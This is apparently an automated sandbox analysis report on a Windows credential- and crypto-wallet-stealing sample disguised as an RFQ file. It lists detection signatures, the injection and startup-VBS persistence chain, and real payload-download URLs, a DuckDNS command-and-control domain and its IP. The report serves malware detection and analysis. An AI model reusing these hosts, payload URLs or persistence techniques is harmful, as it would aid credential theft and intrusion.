Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ-12202430_ACD_Group.pif.exe

Overview

General Information

Sample name:RFQ-12202430_ACD_Group.pif.exe
Analysis ID:1586919
MD5:a451e1ead24bd11248f2365a292fb822
SHA1:7a9916112c6ef5eb1647127e47a55338df1737e6
SHA256:a41bf7d87976adc297aa44703f31eab78be9c3ac80c0d10d621c603b68963c36
Tags:exeuser-lowmal3
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
AI detected suspicious sample
Drops VBS files to the startup folder
Found many strings related to Crypto-Wallets (likely being stolen)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SGDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • RFQ-12202430_ACD_Group.pif.exe (PID: 7544 cmdline: "C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exe" MD5: A451E1EAD24BD11248F2365A292FB822)
    • InstallUtil.exe (PID: 7676 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 7932 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AuditFlags.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • AuditFlags.exe (PID: 7992 cmdline: "C:\Users\user\AppData\Roaming\AuditFlags.exe" MD5: A451E1EAD24BD11248F2365A292FB822)
      • InstallUtil.exe (PID: 8072 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.1784098344.0000000002B93000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000000.00000002.1479490419.00000000064C0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000005.00000002.1622157833.0000000002967000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000000.00000002.1465657155.0000000003057000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          00000002.00000002.3871748877.0000000002965000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.RFQ-12202430_ACD_Group.pif.exe.64c0000.2.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AuditFlags.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AuditFlags.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AuditFlags.vbs" , ProcessId: 7932, ProcessName: wscript.exe
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AuditFlags.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AuditFlags.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AuditFlags.vbs" , ProcessId: 7932, ProcessName: wscript.exe

              Data Obfuscation

              barindex
              Sigma detected: Drops script at startup location
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exe, ProcessId: 7544, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AuditFlags.vbs

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-09T19:02:18.154052+010020355951Domain Observed Used for C2 Detected193.187.91.21850787192.168.2.849707TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: RFQ-12202430_ACD_Group.pif.exeAvira: detected
              Antivirus detection for dropped file
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeAvira: detection malicious, Label: HEUR/AGEN.1308645
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeReversingLabs: Detection: 60%
              Multi AV Scanner detection for submitted file
              Source: RFQ-12202430_ACD_Group.pif.exeReversingLabs: Detection: 60%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: RFQ-12202430_ACD_Group.pif.exeJoe Sandbox ML: detected
              Source: RFQ-12202430_ACD_Group.pif.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.logJump to behavior
              Source: unknownHTTPS traffic detected: 209.58.149.225:443 -> 192.168.2.8:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 209.58.149.225:443 -> 192.168.2.8:49711 version: TLS 1.2
              Source: RFQ-12202430_ACD_Group.pif.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: RFQ-12202430_ACD_Group.pif.exe, 00000000.00000002.1480750438.0000000006660000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: RFQ-12202430_ACD_Group.pif.exe, 00000000.00000002.1480750438.0000000006660000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: RFQ-12202430_ACD_Group.pif.exe, 00000000.00000002.1479819783.0000000006570000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: RFQ-12202430_ACD_Group.pif.exe, 00000000.00000002.1479819783.0000000006570000.00000004.08000000.00040000.00000000.sdmp
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_016D1BFF
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_016D1C14
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 4x nop then jmp 065F7BEBh0_2_065F7B68
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 4x nop then jmp 065FE91Ch0_2_065FE710
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 4x nop then jmp 065FE91Ch0_2_065FE720
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 4x nop then jmp 065FE91Ch0_2_065FEA36
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 4x nop then jmp 065F7BEBh0_2_065F7B59
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 4x nop then jmp 066D0D80h0_2_066D0CC8
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 4x nop then jmp 066D0D80h0_2_066D0CC1
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h5_2_00F11BFF
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h5_2_00F11C14
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 4x nop then jmp 05F9EA50h5_2_05F9E998
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 4x nop then jmp 05F9EA50h5_2_05F9E990
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 4x nop then jmp 05FB7BEBh5_2_05FB7B68
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 4x nop then jmp 05FBE91Ch5_2_05FBE720
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 4x nop then jmp 05FBE91Ch5_2_05FBE710
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 4x nop then jmp 05FB7BEBh5_2_05FB7B59
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 4x nop then jmp 05FBE91Ch5_2_05FBEA36

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 193.187.91.218:50787 -> 192.168.2.8:49707
              Uses dynamic DNS services
              Source: unknownDNS query: name: pureeratee.duckdns.org
              Source: global trafficTCP traffic: 192.168.2.8:49707 -> 193.187.91.218:50787
              Source: global trafficHTTP traffic detected: GET /wp-panel/uploads/Mqdwogssw.vdf HTTP/1.1Host: www.chirreeirl.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /wp-panel/uploads/Mqdwogssw.vdf HTTP/1.1Host: www.chirreeirl.comConnection: Keep-Alive
              Source: Joe Sandbox ViewASN Name: OBE-EUROPEObenetworkEuropeSE OBE-EUROPEObenetworkEuropeSE
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /wp-panel/uploads/Mqdwogssw.vdf HTTP/1.1Host: www.chirreeirl.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /wp-panel/uploads/Mqdwogssw.vdf HTTP/1.1Host: www.chirreeirl.comConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: www.chirreeirl.com
              Source: global trafficDNS traffic detected: DNS query: pureeratee.duckdns.org
              Source: InstallUtil.exe, 00000002.00000002.3868130294.0000000000B46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
              Source: InstallUtil.exe, 00000002.00000002.3868130294.0000000000BAA000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.2.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: RFQ-12202430_ACD_Group.pif.exe, 00000000.00000002.1465657155.0000000003011000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3871748877.0000000002965000.00000004.00000800.00020000.00000000.sdmp, AuditFlags.exe, 00000005.00000002.1622157833.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: InstallUtil.exe, 00000002.00000002.3871748877.0000000002965000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.1784098344.0000000002B93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dll
              Source: InstallUtil.exe, 00000002.00000002.3871748877.0000000002965000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.1784098344.0000000002B93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exe
              Source: InstallUtil.exe, 00000002.00000002.3871748877.0000000002965000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.1784098344.0000000002B93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exe
              Source: RFQ-12202430_ACD_Group.pif.exe, 00000000.00000002.1479819783.0000000006570000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
              Source: RFQ-12202430_ACD_Group.pif.exe, 00000000.00000002.1479819783.0000000006570000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
              Source: RFQ-12202430_ACD_Group.pif.exe, 00000000.00000002.1479819783.0000000006570000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
              Source: RFQ-12202430_ACD_Group.pif.exe, 00000000.00000002.1479819783.0000000006570000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3871748877.0000000002965000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.1784098344.0000000002B93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
              Source: RFQ-12202430_ACD_Group.pif.exe, 00000000.00000002.1479819783.0000000006570000.00000004.08000000.00040000.00000000.sdmp, RFQ-12202430_ACD_Group.pif.exe, 00000000.00000002.1465657155.0000000003057000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3871748877.0000000002965000.00000004.00000800.00020000.00000000.sdmp, AuditFlags.exe, 00000005.00000002.1622157833.0000000002967000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.1784098344.0000000002B93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
              Source: RFQ-12202430_ACD_Group.pif.exe, 00000000.00000002.1479819783.0000000006570000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
              Source: InstallUtil.exe, 00000002.00000002.3871748877.0000000002965000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.1784098344.0000000002B93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot
              Source: RFQ-12202430_ACD_Group.pif.exe, 00000000.00000002.1465657155.0000000003011000.00000004.00000800.00020000.00000000.sdmp, AuditFlags.exe, 00000005.00000002.1622157833.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.chirreeirl.com
              Source: RFQ-12202430_ACD_Group.pif.exe, AuditFlags.exe.0.drString found in binary or memory: https://www.chirreeirl.com/wp-panel/uploads/Mqdwogssw.vdf
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownHTTPS traffic detected: 209.58.149.225:443 -> 192.168.2.8:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 209.58.149.225:443 -> 192.168.2.8:49711 version: TLS 1.2

              System Summary

              barindex
              Initial sample is a PE file and has a suspicious name
              Source: initial sampleStatic PE information: Filename: RFQ-12202430_ACD_Group.pif.exe
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_066D4EA0 NtResumeThread,0_2_066D4EA0
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_066D2588 NtProtectVirtualMemory,0_2_066D2588
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_066D4E99 NtResumeThread,0_2_066D4E99
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_066D2583 NtProtectVirtualMemory,0_2_066D2583
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_06072C88 NtResumeThread,5_2_06072C88
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_06070778 NtProtectVirtualMemory,5_2_06070778
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_06072C80 NtResumeThread,5_2_06072C80
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_06070770 NtProtectVirtualMemory,5_2_06070770
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_016D216F0_2_016D216F
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_016D21A00_2_016D21A0
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_016D27220_2_016D2722
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_063B86CB0_2_063B86CB
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_063B6D470_2_063B6D47
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_063B49500_2_063B4950
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_063BCBF00_2_063BCBF0
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_063B10600_2_063B1060
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_063B10500_2_063B1050
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_064B77B80_2_064B77B8
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_064B7A930_2_064B7A93
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_064B77AA0_2_064B77AA
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_064B00400_2_064B0040
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_064B001E0_2_064B001E
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_064B61480_2_064B6148
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_064B61000_2_064B6100
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_064B61380_2_064B6138
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_065C46600_2_065C4660
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_065C00400_2_065C0040
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_065C00060_2_065C0006
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_065C10F80_2_065C10F8
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_065C10E90_2_065C10E9
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_065C5C680_2_065C5C68
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_065C49870_2_065C4987
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_065DE7600_2_065DE760
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_065DE7500_2_065DE750
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_065D64980_2_065D6498
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_065D64880_2_065D6488
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_065F97600_2_065F9760
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_065FA4380_2_065FA438
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_065F43180_2_065F4318
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_065F97520_2_065F9752
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_065F97EF0_2_065F97EF
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_065F9C4A0_2_065F9C4A
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_065FA42A0_2_065FA42A
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_065FC8480_2_065FC848
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_065FC8A80_2_065FC8A8
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_066D598B0_2_066D598B
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_068A001E0_2_068A001E
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_068A00400_2_068A0040
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_068BE1800_2_068BE180
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00D52DA82_2_00D52DA8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00D56EA02_2_00D56EA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00D541982_2_00D54198
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00D541882_2_00D54188
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00D52DA82_2_00D52DA8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00D52D982_2_00D52D98
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00D56E9F2_2_00D56E9F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05135D082_2_05135D08
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05137C682_2_05137C68
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05130A982_2_05130A98
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0513BD402_2_0513BD40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05130F7F2_2_05130F7F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_051D11702_2_051D1170
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_051DD0F02_2_051DD0F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_051D23402_2_051D2340
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05205A802_2_05205A80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_052045882_2_05204588
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0520C7482_2_0520C748
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0520A6212_2_0520A621
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_052096812_2_05209681
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_052096902_2_05209690
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0520B1372_2_0520B137
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0520B1482_2_0520B148
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0520F1B82_2_0520F1B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0520D0682_2_0520D068
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0520D0582_2_0520D058
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05205A702_2_05205A70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05216C182_2_05216C18
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05216F782_2_05216F78
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0521C5882_2_0521C588
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05216C082_2_05216C08
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05216F192_2_05216F19
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05216F682_2_05216F68
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_053395B02_2_053395B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_053366382_2_05336638
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_053356182_2_05335618
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_053359602_2_05335960
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0533B8EF2_2_0533B8EF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05338AC52_2_05338AC5
